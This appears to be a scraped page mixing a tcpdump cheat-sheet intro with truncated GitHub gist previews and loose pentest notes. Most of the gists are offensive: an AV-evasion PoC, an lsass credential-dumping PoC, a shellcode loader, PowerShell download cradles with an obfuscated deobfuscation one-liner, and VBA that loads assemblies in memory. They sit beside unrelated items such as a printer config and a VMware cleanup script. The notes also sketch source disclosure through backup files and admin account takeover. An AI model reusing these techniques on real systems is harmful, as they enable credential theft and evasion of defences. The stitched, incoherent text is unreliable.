
Tcpdump is a CLI tool to capture raw network packets. This is useful for various forms of network troubleshooting. This cheat sheet covers all the basic and advanced options for tcpdump.

Tcpdump cheat sheet

how-to-use-tcpdump

Tcpdump is a widely used network packet analyzer that displays TCP/IP and other packets transmitted over a network interface of the system on which it is installed. Tcpdump uses the libpcap library to capture packets and is available on almost all Linux/Unix flavors.

Capture ICMP Packets With Tcpdump

@broestls
broestls / Remove_VMwareTools.ps1
Last active April 28, 2024 14:05
Force removal of VMware Tools, Program Files, and Windows Services
# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019
# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes.
# This function pulls out the common ID used for most of the VMware registry entries along with the ID
# associated with the MSI for VMware Tools.
function Get-VMwareToolsInstallerID {
    foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) {
        If ($item.GetValue('ProductName') -eq 'VMware Tools') {
            return @{
                reg_id = $item.PSChildName;
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
@jthuraisamy
jthuraisamy / loaded_psp_drivers.cpp
Last active October 15, 2023 03:01
Loaded Security Product Drivers
#include <Windows.h>
#include <ImageHlp.h>
#include <strsafe.h>
#include "loaded_psp_drivers.h"
#include <set>
#include <string>
#include <algorithm>
#pragma comment(lib, "crypt32.lib")
@GeneralTesler
GeneralTesler / refl.cpp
Last active November 6, 2023 12:15
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
@mihaiserban
mihaiserban / printer.cfg
Last active April 27, 2024 22:58
Klipper Ender 5 Plus stock printer config
# This file contains pin mappings for the Creality Ender 5 Plus.
# Ender 5 Plus stock uses a Creality v2.2 board, similar to CR-20 Pro.
# To use this config, the firmware should be compiled for the AVR atmega2560.
# See the example.cfg file for a description of available parameters.
[stepper_x]
step_pin: PF0
dir_pin: PF1
enable_pin: !PD7
@mgeeky
mgeeky / shellcodeLoader.go
Created May 13, 2020 21:15
Simple Shellcode loader implemented in Golang
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active January 8, 2024 14:06
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String combined with -bxor, useful for deobfuscating dynamically built strings:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&